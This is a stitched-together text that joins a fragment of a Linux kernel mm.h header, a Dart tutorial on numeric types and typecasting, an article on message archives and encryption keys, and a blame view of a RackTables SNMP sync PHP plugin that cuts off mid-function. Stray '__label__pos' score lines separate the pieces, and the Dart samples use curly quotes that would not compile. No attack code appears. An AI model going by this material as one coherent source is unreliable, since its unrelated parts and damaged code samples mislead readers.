install_special_mapping(struct mm_struct *mm, unsigned long addr, unsigned long len, unsigned long flags, struct page **pages); extern unsigned long get_unmapped_area(struct file *, unsigned long, unsigned long, unsigned long, unsigned long); extern unsigned long do_mmap_pgoff(struct file *file, unsigned long addr, unsigned long len, unsigned long prot, unsigned long flag, unsigned long pgoff); extern unsigned long mmap_region(struct file *file, unsigned long addr, unsigned long len, unsigned long flags, unsigned int vm_flags, unsigned long pgoff); static inline unsigned long do_mmap(struct file *file, unsigned long addr, unsigned long len, unsigned long prot, unsigned long flag, unsigned long offset) { unsigned long ret = -EINVAL; if ((offset + PAGE_ALIGN(len)) < offset) goto out; if (!(offset & ~PAGE_MASK)) ret = do_mmap_pgoff(file, addr, len, prot, flag, offset >> PAGE_SHIFT); out: return ret; } extern int do_munmap(struct mm_struct *, unsigned long, size_t); extern unsigned long do_brk(unsigned long, unsigned long); /* filemap.c */ extern unsigned long page_unuse(struct page *); extern void truncate_inode_pages(struct address_space *, loff_t); extern void truncate_inode_pages_range(struct address_space *, loff_t lstart, loff_t lend); /* generic vm_area_ops exported for stackable file systems */ extern int filemap_fault(struct vm_area_struct *, struct vm_fault *); /* mm/page-writeback.c */ int write_one_page(struct page *page, int wait); void task_dirty_inc(struct task_struct *tsk); /* readahead.c */ #define VM_MAX_READAHEAD 128 /* kbytes */ #define VM_MIN_READAHEAD 16 /* kbytes (includes current page) */ int force_page_cache_readahead(struct address_space *mapping, struct file *filp, pgoff_t offset, unsigned long nr_to_read); void page_cache_sync_readahead(struct address_space *mapping, struct file_ra_state *ra, struct file *filp, pgoff_t offset, unsigned long size); void page_cache_async_readahead(struct address_space *mapping, struct file_ra_state *ra, struct file *filp, struct page *pg, pgoff_t offset, unsigned long size); unsigned long max_sane_readahead(unsigned long nr); unsigned long ra_submit(struct file_ra_state *ra, struct address_space *mapping, struct file *filp); /* Do stack extension */ extern int expand_stack(struct vm_area_struct *vma, unsigned long address); #ifdef CONFIG_IA64 extern int expand_upwards(struct vm_area_struct *vma, unsigned long address); #endif extern int expand_stack_downwards(struct vm_area_struct *vma, unsigned long address); /* Look up the first VMA which satisfies addr < vm_end, NULL if none. */ extern struct vm_area_struct * find_vma(struct mm_struct * mm, unsigned long addr); extern struct vm_area_struct * find_vma_prev(struct mm_struct * mm, unsigned long addr, struct vm_area_struct **pprev); /* Look up the first VMA which intersects the interval start_addr..end_addr-1, NULL if none. Assume start_addr < end_addr. */ static inline struct vm_area_struct * find_vma_intersection(struct mm_struct * mm, unsigned long start_addr, unsigned long end_addr) { struct vm_area_struct * vma = find_vma(mm,start_addr); if (vma && end_addr <= vma->vm_start) vma = NULL; return vma; } static inline unsigned long vma_pages(struct vm_area_struct *vma) { return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT; } pgprot_t vm_get_page_prot(unsigned long vm_flags); struct vm_area_struct *find_extend_vma(struct mm_struct *, unsigned long addr); int remap_pfn_range(struct vm_area_struct *, unsigned long addr, unsigned long pfn, unsigned long size, pgprot_t); int vm_insert_page(struct vm_area_struct *, unsigned long addr, struct page *); int vm_insert_pfn(struct vm_area_struct *vma, unsigned long addr, unsigned long pfn); int vm_insert_mixed(struct vm_area_struct *vma, unsigned long addr, unsigned long pfn); struct page *follow_page(struct vm_area_struct *, unsigned long address, unsigned int foll_flags); #define FOLL_WRITE 0x01 /* check pte is writable */ #define FOLL_TOUCH 0x02 /* mark page accessed */ #define FOLL_GET 0x04 /* do get_page on page */ #define FOLL_DUMP 0x08 /* give error on hole if it would be zero */ #define FOLL_FORCE 0x10 /* get_user_pages read/write w/o permission */ typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr, void *data); extern int apply_to_page_range(struct mm_struct *mm, unsigned long address, unsigned long size, pte_fn_t fn, void *data); #ifdef CONFIG_PROC_FS void vm_stat_account(struct mm_struct *, unsigned long, struct file *, long); #else static inline void vm_stat_account(struct mm_struct *mm, unsigned long flags, struct file *file, long pages) { } #endif /* CONFIG_PROC_FS */ #ifdef CONFIG_DEBUG_PAGEALLOC extern int debug_pagealloc_enabled; extern void kernel_map_pages(struct page *page, int numpages, int enable); static inline void enable_debug_pagealloc(void) { debug_pagealloc_enabled = 1; } #ifdef CONFIG_HIBERNATION extern bool kernel_page_present(struct page *page); #endif /* CONFIG_HIBERNATION */ #else static inline void kernel_map_pages(struct page *page, int numpages, int enable) {} static inline void enable_debug_pagealloc(void) { } #ifdef CONFIG_HIBERNATION static inline bool kernel_page_present(struct page *page) { return true; } #endif /* CONFIG_HIBERNATION */ #endif extern struct vm_area_struct *get_gate_vma(struct task_struct *tsk); #ifdef __HAVE_ARCH_GATE_AREA int in_gate_area_no_task(unsigned long addr); int in_gate_area(struct task_struct *task, unsigned long addr); #else int in_gate_area_no_task(unsigned long addr); #define in_gate_area(task, addr) ({(void)task; in_gate_area_no_task(addr);}) #endif /* __HAVE_ARCH_GATE_AREA */ int drop_caches_sysctl_handler(struct ctl_table *, int, void __user *, size_t *, loff_t *); unsigned long shrink_slab(unsigned long scanned, gfp_t gfp_mask, unsigned long lru_pages); #ifndef CONFIG_MMU #define randomize_va_space 0 #else extern int randomize_va_space; #endif const char * arch_vma_name(struct vm_area_struct *vma); void print_vma_addr(char *prefix, unsigned long rip); struct page *sparse_mem_map_populate(unsigned long pnum, int nid); pgd_t *vmemmap_pgd_populate(unsigned long addr, int node); pud_t *vmemmap_pud_populate(pgd_t *pgd, unsigned long addr, int node); pmd_t *vmemmap_pmd_populate(pud_t *pud, unsigned long addr, int node); pte_t *vmemmap_pte_populate(pmd_t *pmd, unsigned long addr, int node); void *vmemmap_alloc_block(unsigned long size, int node); void vmemmap_verify(pte_t *, int, unsigned long, unsigned long); int vmemmap_populate_basepages(struct page *start_page, unsigned long pages, int node); int vmemmap_populate(struct page *start_page, unsigned long pages, int node); void vmemmap_populate_print_last(void); extern int account_locked_memory(struct mm_struct *mm, struct rlimit *rlim, size_t size); extern void refund_locked_memory(struct mm_struct *mm, size_t size); extern void memory_failure(unsigned long pfn, int trapno); extern int __memory_failure(unsigned long pfn, int trapno, int ref); extern int sysctl_memory_failure_early_kill; extern int sysctl_memory_failure_recovery; extern atomic_long_t mce_bad_pages; #endif /* __KERNEL__ */ #endif /* _LINUX_MM_H */
__label__pos
0.869538
Keywords are pre-defined reserved words which have a special meaning to the interpreted compiler. There are 61 keywords available in dart language. Some of they are – if, else, while, for, extends, abstract etc. Data types Data types used in dart language refer to an extensive system that we use to declare various types of functions or variables in a program. Here, on the basis of the type of variable present in a program, we determine the space that it occupies in storage, along with the way in which the stored bit pattern will be interpreted. A data type specifies the type of data that a variable can store. Examples of static data types in dart – Numbers (integer, double), Strings, Boolean etc. Numbers Dart numbers come in two flavours: int and double Integer(int) Integer values no larger than 64 bits, depending on the platform. On native platforms, values can be from -2^63 to 2^63 – 1. On the web, integer values are represented as JavaScript numbers (64-bit floating-point values with no fractional part) and can be from -2^53 to 2^53 – 1. double 64-bit (double-precision) floating-point numbers, as specified by the IEEE 754 standard. Both int and double are subtypes of num. The num type includes basic operators such as +, -, /, and *, and is also where you’ll find abs(), ceil(), and floor(), among other methods. (Bitwise operators, such as >>, are defined in the int class.) If num and its subtypes don’t have what you’re looking for, the dart:math library might. Code 1: void main(){   // integer variable ‘a’ which initialized with value 10   int a=10;   print(a);   print(a.runtimeType);   // integer variable ‘b’ which initialized with value 20.3   double b=20.3;   print(b);   print(b.runtimeType); } output Typecasting Type casting is a way of converting data from one data type to another data type. This process of data conversion is also known as type conversion or type coercion. Let’s see some examples of change variables data type into another data types. Note: Dart Object type has a .runtimeType instance member (source is from dart-sdk v1.14, don’t know if it was available earlier) for checking any variables data type during run, you need to use .runtimeType You can also declare a variable as a num. If you do this, the variable can contains both integer and double values. Let’s see below code… Code 2: void main() {   num a = 2;   print(‘a is $a’);   print(a.runtimeType);   a = 90.8;   print(‘a is $a’);   print(a.runtimeType); } output ** remember: from the upper code, you see variable ‘a’ data type get changed from int->double. Now let’s converts a string into integer [typecasting another example] Code 3:    .parse() function helps to convert String to int/double. void main() {   // string ’23’ will converted into integer 23 using .parse() function   int a = int.parse(’23’);   print(‘a is $a’);   print(‘variable a type is ‘);   print(a.runtimeType); } output Let’s see some another example of typecasting, string -> integer Code 4: void main() {   String age = ’23’;   print(‘age is $age’);   print(‘age variable type ‘);   print(age.runtimeType);     // variable age inserted into function .parse()   int a = int.parse(age);   print(‘a is $a’);   print(‘variable a type is ‘);   print(a.runtimeType); } output Now let’s converts a string into double (string->double) Code 5: void main(){   String val=’20.3′;   print(‘String val is: $val’);   print(‘val variable data-type: ‘);   print(val.runtimeType);     // typecasting string->double   double amnt=double.parse(val);   print(‘amnt is $amnt’);   print(‘amnt variable data-type: ‘);   print(amnt.runtimeType); } output Now, let’s convert a integers/double valued variables into strings. Note: for this we need to use .toString() function/method. Code 6: void main(){   int a=10;   print(‘a is: $a’);   print(a.runtimeType);   // typecasting int->string by .toString()   String b=a.toString();   print(‘b is: $b’);   print(b.runtimeType); } output Code 7: converts a double into string void main(){   double a=23.45;   print(‘a is: $a’);   print(a.runtimeType);     // double->string .toString()   String df=a.toString();   print(‘String df is: $df’);   print(df.runtimeType); } output Write a code, to print every variable with their respective data type as integer, double, String, bool. Code 8: void main(){   // integer variable ‘a’ with stored value ’10’   int a=10;   print(‘a is: $a’);   print(‘variable A data type: ‘);   print(a.runtimeType);   // double variable ‘b’ with stored value ‘10.1’   double b=10.1;   print(‘b is: $b’);   print(‘variable B data type: ‘);   print(b.runtimeType);   // String variable ‘c’ with stored value ‘microcodes’   String c=”microcodes”;   print(‘c is: $c’);   print(‘variable C data type: ‘);   print(c.runtimeType);   // boolean variable ‘d’ with stored value ‘true’   bool d=true;   print(‘d is: $d’);   d=false;   print(‘d is: $d’);   print(‘variable D data type: ‘);   print(d.runtimeType); } output
__label__pos
0.998968
Message Archives Storage of messages for later use. This becomes a particular issue when the messages contain sensitive information and need keys to be decrypted. Message archives refer to the organized storage of messages for future reference or use. This practice is essential in various fields, from business communications to personal data management. The Importance of Message Archives Archiving messages ensures that important information is not lost and can be retrieved when needed. However, it becomes particularly critical when these messages contain sensitive information. • Sensitive Information: Messages might include confidential details such as financial data, personal identification information (PII), or proprietary business insights. • Security Measures: To protect this sensitive information, encryption is often used. Encryption transforms readable data into a coded format that can only be deciphered with a key. The Role of Encryption Keys in Message Archives The security of archived messages heavily relies on encryption keys. Here’s why they are crucial: 1. Data Protection: Encryption keys ensure that only authorized individuals can access the content of the archived messages by decrypting them back into their original form. 2. Avoiding Unauthorized Access: Without the appropriate decryption key, even if someone gains access to the archives, they will not be able to read the encrypted messages. Pitfalls and Best Practices for Managing Message Archives with Sensitive Information • Avoid Key Loss: Losing an encryption key means losing access to all encrypted data. Always have secure backups for your keys. • Password Protection:: Ensure that your decryption keys themselves are protected with strong passwords and stored securely. • User Access Control: : Limit who has access to both message archives and their corresponding decryption keys. • : Conduct regular audits on your message archive system’s security protocols and practices. • : Follow industry standards and legal requirements regarding data protection and archiving practices. The Future of Message Archiving Technology As technology evolves so do methods for securing archived messages . Expect advancements in areas like quantum cryptography , enhanced AI-driven security measures ,and more robust compliance frameworks . In conclusion properly managing message archives especially those containing sensitive information requires careful consideration regarding encryption techniques ,key management,and overall security practices . By following best practices you can ensure that your valuable communication remains safe over time . • Improved Communication: Access to past conversations provides context and clarity for future interactions. • Accountability and Compliance: Archived messages can be crucial for audits, legal proceedings, or internal investigations. • Knowledge Management: Preserves valuable information and institutional knowledge shared through messages. Disadvantages of Message Archives: • Security Risks: Storing sensitive data in message archives requires robust security measures to prevent unauthorized access and data breaches. • Storage Costs: Maintaining extensive message archives can lead to high storage costs and require complex data management systems. • Privacy Concerns: Archived messages may contain personal or confidential information, raising privacy concerns if not handled properly. Message Archives in Various Areas: Message archives play a vital role in various sectors: 1. Financial Institutions: Retaining financial transaction records and client communications is crucial for compliance and fraud prevention. 2. Healthcare: Secure storage of patient records and communication ensures continuity of care and legal protection. 3. Government: Archiving official communications is essential for transparency, accountability, and historical preservation. Imagine this: you’re emailing with your bank about a sensitive financial matter, or perhaps you’re texting with your doctor about a personal health concern. You wouldn’t want those conversations just floating around in cyberspace forever, would you? That’s where message archives come in. Just like you might store important documents in a secure file cabinet, message archives provide a dedicated storage space for your digital communications. This ensures that: • Important information is readily accessible: Need to reference a past conversation? No problem! Your message archive keeps everything organized and within reach. • Sensitive data stays protected: Message archives often employ encryption, acting like a digital lock and key to safeguard your confidential information. Think of it like this: 1. You send a message containing your credit card details to make an online purchase. 2. The message is encrypted, like sealing it in an envelope that only you and the recipient have the key to open. 3. This encrypted message is then stored securely in a message archive, protected from unauthorized access. So, whether it’s personal messages, financial transactions, or confidential business dealings, message archives provide the peace of mind that comes with knowing your conversations are safe, secure, and always available when you need them.
__label__pos
0.992361
Fixed Rack,Row and Location Bug [racktables-contribs] / snmpgeneric.php CommitLineData 9276dc97 ME 1<?php 2 3/******************************************** 4 * 30bf198b 5 * RackTables 0.20.x snmpgeneric extension 9276dc97 6 * 30bf198b 7 * sync an RackTables object with an SNMP device. 9276dc97 8 * 30bf198b 9 * Should work with almost any SNMP capable device. 9276dc97 10 * 30bf198b 11 * reads SNMP tables: 12 * - system 13 * - ifTable 14 * - ifxTable 15 * - ipAddrTable (ipv4 only) 16 * - ipAddressTable (ipv4 + ipv6) 2141ed46 17 * - ipv6AddrAddress (ipv6) 30bf198b 18 * 19 * Features: 20 * - update object attributes 21 * - create networks 22 * - create ports 23 * - add and bind ip addresses 7c2cfc75 24 * - create as new object 365fb193 25 * - save snmp settings per object (uses comment field) 30bf198b 26 * 27 * Known to work with: 28 * - Enterasys SecureStacks, S-Series 29 * - cisco 2620XM (thx to Rob) 30 * - hopefully many others 31 * 32 * 33 * Usage: 34 * 35 * 1. select "SNMP generic sync" tap 36 * 2. select your SNMP config (host, v1, v2c or v3, ...) 37 * 3. hit "Show List" 38 * 4. you will see a selection of all information that could be retrieved 39 * 5. select what should be updated and/or created 40 * 6. hit "Create" Button to make changes to RackTables 41 * 7. repeat step 1. to 6. as often as you like / need 9276dc97 42 * 9276dc97 43 * 9276dc97 44 * needs PHP 5 30bf198b 45 * 9276dc97 46 * TESTED on FreeBSD 9.0, nginx/1.0.12, php 5.3.10, NET-SNMP 5.7.1 30bf198b 47 * and RackTables <= 0.20.3 9276dc97 48 * af78a786 49 * (c)2015 Maik Ehinger <[email protected]> 9276dc97 ME 50 */ 51 52/**** 53 * INSTALL 02a702a1 54 * just place file in plugins directory 30bf198b 55 * 56 */ 57 58/** 59 * The newest version of this plugin can be found at: 60 * 61 * https://github.com/github138/myRT-contribs/tree/develop-0.20.x 62 * 9276dc97 ME 63 */ 64 65/* TODOs 30bf198b 66 * 9276dc97 ME 67 * - code cleanup 68 * 30bf198b 69 * - test if device supports mibs 9276dc97 ME 70 * - gethostbyaddr / gethostbyname host list 71 * - correct iif_name display if != 1 72 * 73 * - set more Object attributs / fields 9276dc97 74 * 365fb193 75 * - Input variables exceeded 1000 ccf830c6 76 * - update iftypes 365fb193 77 * 9276dc97 ME 78 */ 79 1fc7fc7d 80/* RackTables Debug Mode */ 81//$debug_mode=1; 82 30bf198b 83require_once('inc/snmp.php'); 9276dc97 ME 84 85$tab['object']['snmpgeneric'] = 'SNMP Generic sync'; 86$tabhandler['object']['snmpgeneric'] = 'snmpgeneric_tabhandler'; 00f9fc86 87$trigger['object']['snmpgeneric'] = 'snmpgeneric_tabtrigger'; 9276dc97 ME 88 89$ophandler['object']['snmpgeneric']['create'] = 'snmpgeneric_opcreate'; 90 91/* snmptranslate command */ 92$sg_cmd_snmptranslate = '/usr/local/bin/snmptranslate'; 93 94/* create ports without connector */ 95$sg_create_noconnector_ports = FALSE; 96 97/* deselect add port for this snmp port types */ 98$sg_ifType_ignore = array( 99 '1', /* other */ 100 '24', /* softwareLoopback */ 101 '23', /* ppp */ 102 '33', /* rs232 */ 30bf198b 103 '34', /* para */ 9276dc97 ME 104 '53', /* propVirtual */ 105 '77', /* lapd */ 106 '131', /* tunnel */ 107 '136', /* l3ipvlan */ 108 '160', /* usb */ 109 '161', /* ieee8023adLag */ 110); 111 112/* ifType to RT oif_id mapping */ 113$sg_ifType2oif_id = array( 114 /* 440 causes SQLSTATE[23000]: Integrity constraint violation: 30bf198b 115 * 1452 Cannot add or update a child row: 9276dc97 ME 116 * a foreign key constraint fails 117 */ 118 // '1' => 440, /* other => unknown 440 */ 119 '1' => 1469, /* other => virutal port 1469 */ 30bf198b 120 '6' => 24, /* ethernetCsmacd => 1000BASE-T 24 */ 9276dc97 ME 121 '24' => 1469, /* softwareLoopback => virtual port 1469 */ 122 '33' => 1469, /* rs232 => RS-232 (DB-9) 681 */ 30bf198b 123 '34' => 1469, /* para => virtual port 1469 */ 9276dc97 124 '53' => 1469, /* propVirtual => virtual port 1469 */ 56d281de 125 '62' => 19, /* fastEther => 100BASE-TX 19 */ 9276dc97 ME 126 '131' => 1469, /* tunnel => virtual port 1469 */ 127 '136' => 1469, /* l3ipvlan => virtual port 1469 */ 128 '160' => 1469, /* usb => virtual port 1469 */ 129 '161' => 1469, /* ieee8023adLag => virtual port 1469 */ 130); 131 132/* -------------------------------------------------- */ 133 134/* snmp vendor list http://www.iana.org/assignments/enterprise-numbers */ 135 136$sg_known_sysObjectIDs = array 137( 138 /* ------------ default ------------ */ 139 'default' => array 140 ( 141 // 'text' => 'default', 142 'pf' => array('snmpgeneric_pf_entitymib'), 143 'attr' => array 144 ( 30bf198b 145 2 => array('pf' => 'snmpgeneric_pf_hwtype'), /* HW Typ*/ 9276dc97 ME 146 3 => array('oid' => 'sysName.0'), 147 /* FQDN check only if regex matches */ 148 //3 => array('oid' => 'sysName.0', 'regex' => '/^[^ .]+(\.[^ .]+)+\.?/', 'uncheck' => 'no FQDN'), 149 4 => array('pf' => 'snmpgeneric_pf_swtype', 'uncheck' => 'experimental'), /* SW type */ 150 14 => array('oid' => 'sysContact.0'), /* Contact person */ 151 // 1235 => array('value' => 'Constant'), 30bf198b 152 ), 9276dc97 153 'port' => array 30bf198b 154 ( 9276dc97 ME 155 // 'AC-in' => array('porttypeid' => '1-16', 'uncheck' => 'uncheck reason/comment'), 156 // 'name' => array('porttypeid' => '1-24', 'ifDescr' => 'visible label'), 157 ), 158 ), 159 160 /* ------------ ciscoSystems --------------- */ 161/* '9' => array 162 * ( 163 * 'text' => 'ciscoSystems', 164 * ), 165 */ 166 '9.1' => array 167 ( 168 'text' => 'ciscoProducts', 169 'attr' => array( 170 4 => array('pf' => 'snmpgeneric_pf_catalyst'), /* SW type/version */ 171 16 => array('pf' => 'snmpgeneric_pf_ciscoflash'), /* flash memory */ 30bf198b 172 9276dc97 173 ), 30bf198b 174 9276dc97 ME 175 ), 176 /* ------------ Microsoft --------------- */ 177 '311' => array 178 ( 179 'text' => 'Microsoft', 180 'attr' => array( 181 4 => array('pf' => 'snmpgeneric_pf_swtype', 'oid' => 'sysDescr.0', 'regex' => '/.* Windows Version (.*?) .*/', 'replacement' => 'Windows \\1', 'uncheck' => 'TODO RT matching'), /*SW type */ 182 ), 183 ), 184 /* ------------ Enterasys --------------- */ 185 '5624' => array 186 ( 187 'text' => 'Enterasys', 188 'attr' => array( 189 4 => array('pf' => 'snmpgeneric_pf_enterasys'), /* SW type/version */ 190 ), 191 ), 192 193 /* Enterasys N3 */ 194 '5624.2.1.53' => array 30bf198b 195 ( 0ffff63b 196 'dict_key' => 2021, 197 'text' => 'Matrix N3', 30bf198b 198 ), 9276dc97 ME 199 200 '5624.2.2.284' => array 30bf198b 201 ( 9276dc97 202 'dict_key' => 50002, 30bf198b 203 'text' => 'Securestack C2', 204 ), 9276dc97 ME 205 206 '5624.2.1.98' => array 30bf198b 207 ( 9276dc97 208 'dict_key' => 50002, 30bf198b 209 'text' => 'Securestack C3', 210 ), 9276dc97 ME 211 212 '5624.2.1.100' => array 30bf198b 213 ( 9276dc97 214 'dict_key' => 50002, 30bf198b 215 'text' => 'Securestack B3', 216 ), 9276dc97 ME 217 218 '5624.2.1.128' => array 30bf198b 219 ( 0ffff63b 220 'dict_key' => 1970, 221 'text' => 'S-series SSA130', 30bf198b 222 ), 9276dc97 ME 223 224 '5624.2.1.129' => array 30bf198b 225 ( 0ffff63b 226 'dict_key' => 1970, 227 'text' => 'S-series SSA150', 30bf198b 228 ), 9276dc97 ME 229 230 '5624.2.1.137' => array 30bf198b 231 ( 0ffff63b 232 'dict_key' => 1987, 30bf198b 233 'text' => 'Securestack B5 POE', 234 ), 9276dc97 ME 235 236 /* S3 */ 237 '5624.2.1.131' => array 238 ( 0ffff63b 239 'dict_key' => 1974, 240 'text' => 'S-series S3', 9276dc97 ME 241 ), 242 243 /* S4 */ 244 '5624.2.1.132' => array 245 ( 0ffff63b 246 'dict_key' => 1975, 247 'text' => 'S-series S4' 9276dc97 ME 248 ), 249 250 /* S8 */ 251 '5624.2.1.133' => array 252 ( 0ffff63b 253 'dict_key' => 1977, 254 'text' => 'S-series S8' 255 ), 256 257 '5624.2.1.165' => array 258 ( 259 'dict_key' => 1971, 260 'text' => 'S-series Bonded SSA', 9276dc97 ME 261 ), 262 263 /* ------------ net-snmp --------------- */ 264 '8072' => array 265 ( 30bf198b 266 'text' => 'net-snmp', 9276dc97 ME 267 'attr' => array( 268 4 => array('pf' => 'snmpgeneric_pf_swtype', 'oid' => 'sysDescr.0', 'regex' => '/(.*?) .*? (.*?) .*/', 'replacement' => '\\1 \\2', 'uncheck' => 'TODO RT matching'), /*SW type */ 269 ), 270 ), 271 272 /* ------------ Frauenhofer FOKUS ------------ */ 273 '12325' => array 274 ( 275 'text' => 'Fraunhofer FOKUS', 276 'attr' => array( 277 4 => array('pf' => 'snmpgeneric_pf_swtype', 'oid' => 'sysDescr.0', 'regex' => '/.*? .*? (.*? .*).*/', 'replacement' => '\\1', 'uncheck' => 'TODO RT matching'), /*SW type */ 278 ), 279 ), 280 281 '12325.1.1.2.1.1' => array 282 ( 283 'dict_key' => 42, /* Server model noname/unknown */ 284 'text' => 'BSNMP - mini SNMP daemon (bsnmpd)', 285 ), 286 287) + $known_switches; 288/* add snmp.php known_switches */ 289 290/* ------------ Sample function --------------- */ 291/* 292 * Sample Precessing Function (pf) 293 */ 294function snmpgeneric_pf_sample(&$snmp, &$sysObjectID, $attr_id) { 295 296 $object = &$sysObjectID['object']; 297 $attr = &$sysObjectID['attr'][$attr_id]; 298 299 if(!isset($attr['oid'])) 300 return; 301 302 /* output success banner */ 303 showSuccess('Found sysObjectID '.$sysObjectID['value']); 304 305 /* access attribute oid setting and do snmpget */ 306 $oid = $attr['oid']; 307 $value = $snmp->get($oid); 308 309 /* set new attribute value */ 310 $attr['value'] = $value; 311 312 /* do not check attribute per default */ 313 $attr['uncheck'] = "comment"; 314 315 /* set informal comment */ 316 $attr['comment'] = "comment"; 317 318 /* add additional ports */ 319 // $sysObjectID['port']['name'] = array('porttypeid' => '1-24', 'ifPhysAddress' => '001122334455', 'ifDescr' => 'visible label', 'uncheck' => 'comment', 'disabled' => 'porttypeid select disabled'); 320 321 /* set other attribute */ 322// $sysObjectID['attr'][1234]['value'] = 'attribute value'; 323 324} /* snmpgeneric_pf_sample */ 325 326/* ------------ Enterasys --------------- */ 327 328function snmpgeneric_pf_enterasys(&$snmp, &$sysObjectID, $attr_id) { 329 330 $attrs = &$sysObjectID['attr']; 331 332 //snmpgeneric_pf_entitymib($snmp, $sysObjectID, $attr_id); 333 334 /* TODO find correct way to get Bootroom and Firmware versions */ 335 336 /* Model */ 30bf198b 337 /*if(preg_match('/.*\.([^.]+)$/', $sysObjectID['value'], $matches)) { 9276dc97 ME 338 * showNotice('Device '.$matches[1]); 339 *} 340 */ 341 342 /* TODO SW type */ 343 //$attrs[4]['value'] = 'Enterasys'; /* SW type */ a2ce4850 344 $attrs[4]['key'] = '0'; /* SW type dict key 0 = NOT SET*/ 9276dc97 ME 345 346 /* set SW version only if not already set by entitymib */ 347 if(isset($attrs[5]['value']) && !empty($attrs[5]['value'])) { 30bf198b 348 9276dc97 349 /* SW version from sysDescr */ 30bf198b 350 if(preg_match('/^Enterasys .* Inc\. (.+) [Rr]ev ([^ ]+) ?(.*)$/', $snmp->sysDescr, $matches)) { 9276dc97 ME 351 352 $attrs[5]['value'] = $matches[2]; /* SW version */ 30bf198b 353 9276dc97 ME 354 // showSuccess("Found Enterasys Model ".$matches[1]); 355 } 356 357 } /* SW version */ 358 359 /* add serial port */ 30bf198b 360 //$sysObjectID['port']['console'] = array('porttypeid' => '1-29', 'ifDescr' => 'console', 'disabled' => 'disabled'); 9276dc97 ME 361 362} 363 364/* ------------ Cisco --------------- */ 365 366/* logic from snmp.php */ 367function snmpgeneric_pf_catalyst(&$snmp, &$sysObjectID, $attr_id) { 368 $attrs = &$sysObjectID['attr']; 30bf198b 369 $ports = &$sysObjectID['port']; 9276dc97 ME 370 371 /* sysDescr multiline on C5200 */ 372 if(preg_match ('/.*, Version ([^ ]+), .*/', $snmp->sysDescr, $matches)) { 373 $exact_release = $matches[1]; 30bf198b 374 $major_line = preg_replace ('/^([[:digit:]]+\.[[:digit:]]+)[^[:digit:]].*/', '\\1', $exact_release); 9276dc97 ME 375 376 $ios_codes = array 30bf198b 377 ( 378 '12.0' => 244, 379 '12.1' => 251, 380 '12.2' => 252, 381 ); 382 9276dc97 ME 383 $attrs[5]['value'] = $exact_release; 384 30bf198b 385 if (array_key_exists ($major_line, $ios_codes)) a2ce4850 386 { 9276dc97 387 $attrs[4]['value'] = $ios_codes[$major_line]; a2ce4850 388 $attrs[4]['key'] = $ios_codes[$major_line]; 389 } 9276dc97 ME 390 391 } /* sw type / version */ 392 393 $sysChassi = $snmp->get ('1.3.6.1.4.1.9.3.6.3.0'); 394 if ($sysChassi !== FALSE or $sysChassi !== NULL) 395 $attrs[1]['value'] = str_replace ('"', '', $sysChassi); 396 30bf198b 397 $ports['con0'] = array('porttypeid' => '1-29', 'ifDescr' => 'console'); // RJ-45 RS-232 console 9276dc97 ME 398 399 if (preg_match ('/Cisco IOS Software, C2600/', $snmp->sysDescr)) 30bf198b 400 $ports['aux0'] = array('porttypeid' => '1-29', 'ifDescr' => 'auxillary'); // RJ-45 RS-232 aux port 9276dc97 ME 401 402 // blade devices are powered through internal circuitry of chassis 403 if ($sysObjectID['value'] != '9.1.749' and $sysObjectID['value'] != '9.1.920') 404 { 30bf198b 405 $ports['AC-in'] = array('porttypeid' => '1-16'); 9276dc97 ME 406 } 407 408} /* snmpgeneric_pf_catalyst */ 409 410/* -------------------------------------------------- */ 411function snmpgeneric_pf_ciscoflash(&$snmp, &$sysObjectID, $attr_id) { 30bf198b 412 /* 9276dc97 ME 413 * ciscoflashMIB = 1.3.6.1.4.1.9.9.10 414 */ 415 /* 416 | 16 | uint | flash memory, MB | 417 */ 418 $attrs = &$sysObjectID['attr']; 419 30bf198b 420 $ciscoflash = $snmp->walk('1.3.6.1.4.1.9.9.10.1.1.2'); /* ciscoFlashDeviceTable */ 9276dc97 421 5eb2e24f 422 if(!$ciscoflash) 423 return; 424 9276dc97 ME 425 $flash = array_keys($ciscoflash, 'flash'); 426 427 foreach($flash as $oid) { 428 if(!preg_match('/(.*)?\.[^\.]+\.([^\.]+)$/',$oid,$matches)) 429 continue; 430 431 $index = $matches[2]; 432 $prefix = $matches[1]; 433 434 showSuccess("Found Flash: ".$ciscoflash[$prefix.'.8.'.$index]." ".$ciscoflash[$prefix.'.2.'.$index]." bytes"); 435 30bf198b 436 $attrs[16]['value'] = ceil($ciscoflash[$prefix.'.2.'.$index] / 1024 / 1024); /* ciscoFlashDeviceSize */ 9276dc97 ME 437 438 } 439 440 /* 441 * ciscoMemoryPoolMIB = 1.3.6.1.4.1.9.9.48 442 * ciscoMemoryPoolUsed .1.1.1.5 443 * ciscoMemoryPoolFree .1.1.1.6 444 */ 445 446 $ciscomem = $snmp->walk('1.3.6.1.4.1.9.9.48'); 447 448 if(!empty($ciscomem)) { 449 450 $used = 0; 451 $free = 0; 452 453 foreach($ciscomem as $oid => $value) { 30bf198b 454 9276dc97 ME 455 switch(preg_replace('/.*?(\.1\.1\.1\.[^\.]+)\.[^\.]+$/','\\1',$oid)) { 456 case '.1.1.1.5': 457 $used += $value; 458 break; 459 case '.1.1.1.6': 460 $free += $value; 461 break; 462 } 463 464 } 465 30bf198b 466 $attrs[17]['value'] = ceil(($free + $used) / 1024 / 1024); /* RAM, MB */ 9276dc97 ME 467 } 468 469} /* snmpgeneric_pf_ciscoflash */ 470 471/* -------------------------------------------------- */ 472/* -------------------------------------------------- */ 473 474/* HW Type processor function */ 475function snmpgeneric_pf_hwtype(&$snmp, &$sysObjectID, $attr_id) { 476 477 $attr = &$sysObjectID['attr'][$attr_id]; 478 479 if (isset($sysObjectID['dict_key'])) { 480 481 $value = $sysObjectID['dict_key']; 482 showSuccess("Found HW type dict_key: $value"); 30bf198b 483 9276dc97 ME 484 /* return array of attr_id => attr_value) */ 485 $attr['value'] = $value; a2ce4850 486 $attr['key'] = $value; 9276dc97 ME 487 488 } else { 489 showNotice("HW type dict_key not set - Unknown OID"); 490 } 491 492} /* snmpgeneric_pf_hwtype */ 493 494/* -------------------------------------------------- */ 495 496/* SW type processor function */ 497/* experimental */ 498/* Find a way to match RT SW types !? */ 499function snmpgeneric_pf_swtype(&$snmp, &$sysObjectID, $attr_id) { 500 501 /* 4 = SW type */ 502 30bf198b 503 $attr = &$sysObjectID['attr'][$attr_id]; 9276dc97 ME 504 505 $object = &$sysObjectID['object']; 506 507 $objtype_id = $object['objtype_id']; 508 509 if(isset($attr['oid'])) 510 $oid = $attr['oid']; 511 else 30bf198b 512 $oid = 'sysDescr.0'; 9276dc97 ME 513 514 $raw_value 